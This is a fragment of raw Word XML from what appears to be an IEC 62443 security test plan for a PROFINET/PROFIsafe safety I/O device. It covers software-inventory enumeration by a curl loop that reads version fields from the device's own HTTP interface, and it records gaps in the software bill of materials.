      <w:r w:rsidR="004C232E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFINET acyclic (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86EE9D" w14:textId="308E06E0" w:rsidR="00991FEB" w:rsidRPr="006D5B99" w:rsidRDefault="00DD2D6F" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/firmware/version, /fieldbussetup/fieldbusfirmware</w:t>
      </w:r>
      <w:r w:rsidR="00587B1C" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFIsafe stack version (SRIO-2953, SRIO-2948).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193686C0" w14:textId="77777777" w:rsidR="00991FEB" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33526A41" w14:textId="3435DEB0" w:rsidR="00EB591A" w:rsidRPr="006D5B99" w:rsidRDefault="00EB591A" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-1: Identical root cause to RQ-004 G-2: no SBOM of µC/OS-II, PROFIsafe stack, STM32F7 STL, netX90 </w:t>
      </w:r>
      <w:r w:rsidR="00CF5E90" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.8 met at product granularity, not component granularity. Reuse TC-RQ004-02; do not re-derive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920674F" w14:textId="2BFC6FCB" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="00EB591A" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2: Plaintext HTTP inventory read; defence-in-depth observation only (EN 50742 FR4 = none), not a conformance FAIL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005658E0" w14:textId="77777777" w:rsidR="00533DB1" w:rsidRPr="006D5B99" w:rsidRDefault="00533DB1" w:rsidP="00533DB1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9E30E8" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D118A0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2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E81BE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1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4783816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B090CE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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CDD8D9A" w14:textId="77777777" w:rsidR="006438ED"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Enumerate the full installed-software surface (/deviceinfo/swinfo/*, I&amp;M0, I&amp;M5, /firmware/version, /fieldbussetup/fieldbusfirmware); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032BDB02" w14:textId="0A55E923" w:rsidR="00900880" w:rsidRPr="006D5B99"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build the installed-software inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447D9259" w14:textId="06FA22D0" w:rsidR="00900880" w:rsidRPr="006D5B99"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CR 7.8; confirms host/SCPU/bootloader/stack identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20644A23" w14:textId="710828B3"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 OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427CD71D" w14:textId="1D7A2B66" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D0255F" w14:textId="665D2D94" w:rsidR="00041E44"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SBOM completeness / version </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5966E077" w14:textId="574D0BF2" w:rsidR="00900880" w:rsidRPr="006D5B99"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5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REUSE TC-RQ004-02 by reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABE1117" w14:textId="38BE031C" w:rsidR="00900880" w:rsidRPr="006D5B99"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Proves G-1 </w:t>
            </w:r>
            <w:r w:rsidR="00631E62" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>requirement-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400B9B9D" w14:textId="77777777" w:rsidR="00817ED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OWASP FSTM ‘SBOM Generation’; BSI TR-03183-2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A293B8" w14:textId="3B5B7E5D" w:rsidR="00900880" w:rsidRPr="006D5B99"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ifm CM-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2009D70F" w14:textId="562582AB" w:rsidR="00900880" w:rsidRPr="006D5B99"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65662F24" w14:textId="6B8AB25F" w:rsidR="00900880" w:rsidRPr="006D5B99"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Passive plaintext capture of the inventory read (DiD observation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2B6540" w14:textId="3001892D" w:rsidR="00900880" w:rsidRPr="006D5B99"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Documents G-2 (DiD only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D814AD" w14:textId="495C2494" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.5; OWASP ISTG-DES-INFO; ifm CM-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479E152D" w14:textId="58942E19" w:rsidR="00900880" w:rsidRPr="006D5B99"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12C6E7AF" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B2EF46" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B0B187" w14:textId="7DC247F3" w:rsidR="00B41398" w:rsidRPr="006D5B99" w:rsidRDefault="00B41398" w:rsidP="00A47487">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119DCB09" w14:textId="77777777" w:rsidR="003C03DD" w:rsidRPr="006D5B99" w:rsidRDefault="003C03DD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3292544E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963E3A5" w14:textId="77777777" w:rsidR="008E13FA" w:rsidRPr="006D5B99" w:rsidRDefault="008E13FA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F4DD53" w14:textId="12938DE7" w:rsidR="008E13FA" w:rsidRPr="006D5B99" w:rsidRDefault="00176591" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC1335">
        <w:rPr>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ006-01 -  Installed-Software Inventory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EA80A"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3BE6489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225CC181" w14:textId="6A19D7D5" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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RQ-006 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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56AC8E2" w14:textId="219626C3"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(requirement level); test itself functional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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F8AC774" w14:textId="7170D8B0" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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044E52D" w14:textId="77777777" w:rsidR="003B2292"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D5B99"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map each entry to the safety function it supports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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7FCF64F"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software-version and bootloader-version fields via the identification interface.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E820373"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software-revision identity record and any annotation record.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCB28F2" w14:textId="77777777" w:rsidR="00487EE8"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firmware and communication-stack version fields.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309B76EB" w14:textId="28EEA169" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Assemble the inventory; map each entry to its supported safety function.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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2257682" w14:textId="77777777" w:rsidR="00E95CA2"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D5B99"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any safety-relevant installed component is not individually identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D8CC8B4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFC6413"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C130CF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7449C89" w14:textId="2ABF4E4E" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ006-01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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052FAD01" w14:textId="3227D750" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00804391"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re</w:t>
            </w:r>
            <w:r w:rsidR="007346C3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ad</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Engineering Laptop für I&amp;M-Auslesen via TIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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7EFFECD7" w14:textId="08277AEF" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="007B1DD5"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TIA Online &amp; Diagnose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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4E6B623F"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for p in deviceinfo/swinfo/cpubootloaderversion deviceinfo/swinfo/scpuversion \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A4F67D"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deviceinfo/swinfo/scpubootloaderversion deviceinfo/swrevision firmware/version \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B90C698"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fieldbussetup/fieldbusfirmware; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1F7D00"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en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>echo "== $p =="</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0B434A"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pt-BR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">  curl -s http://$SRIO/$p/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E214301" w14:textId="77777777" w:rsidR="001142FB"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pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A66E82" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="001142FB"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done | tee cm_rq006-01_installed.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE97ED9" w14:textId="77777777" w:rsidR="007346C3" w:rsidRPr="006D5B99" w:rsidRDefault="007346C3" w:rsidP="001142FB">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128EAF5F" w14:textId="27606616" w:rsidR="007346C3" w:rsidRPr="006D5B99" w:rsidRDefault="001A6F90" w:rsidP="001142F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w:t>
            </w:r>
            <w:r w:rsidR="007346C3" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I&amp;M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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3FA5272B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="003A1DBD" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A04FC9" w14:textId="77777777" w:rsidR="00BF122B" w:rsidRPr="006D5B99" w:rsidRDefault="00880A0F" w:rsidP="00880A0F">
            <w:pPr>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Host FW, both bootloaders, SCPU FW, stack version retrievable + consistent. Evidence: cm_rq006-01_installed.txt, TIA I&amp;M0/I&amp;M4 screenshots</w:t>
            </w:r>
            <w:r w:rsidR="008036EF" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008036EF" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="647AEEBE" w14:textId="77777777" w:rsidR="00BF122B" w:rsidRPr="006D5B99" w:rsidRDefault="00BF122B" w:rsidP="00880A0F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="577D0B14" w14:textId="77777777" w:rsidR="00BF122B" w:rsidRPr="006D5B99" w:rsidRDefault="00BF122B" w:rsidP="00880A0F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31961E2F" w14:textId="1014F167" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="008036EF" w:rsidP="008036EF">
            <w:pPr>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lastRenderedPageBreak/>
              <w:t xml:space="preserve"> reference RQ-004-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="503E18B5" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F58C9F" w14:textId="4553E1CA" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="006570B1" w:rsidP="00254A92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ006-02 - </w:t>
      </w:r>
      <w:r w:rsidR="00E95CA2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM Completeness &amp; Vulnerability Correlation </w:t>
      </w:r>
      <w:r w:rsidR="00E95CA2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="00E95CA2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="00E95CA2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>004-</w:t>
      </w:r>
      <w:r w:rsidR="00F22C23" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120639D" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="00254A9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6D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44699239"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6D5B99"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6D5B99" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="142A22C8" w14:textId="25D55B5A" w:rsidR="00254A92" w:rsidRPr="006D5B99"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RQ-006 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 / 62443-4-1 SM-9</w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
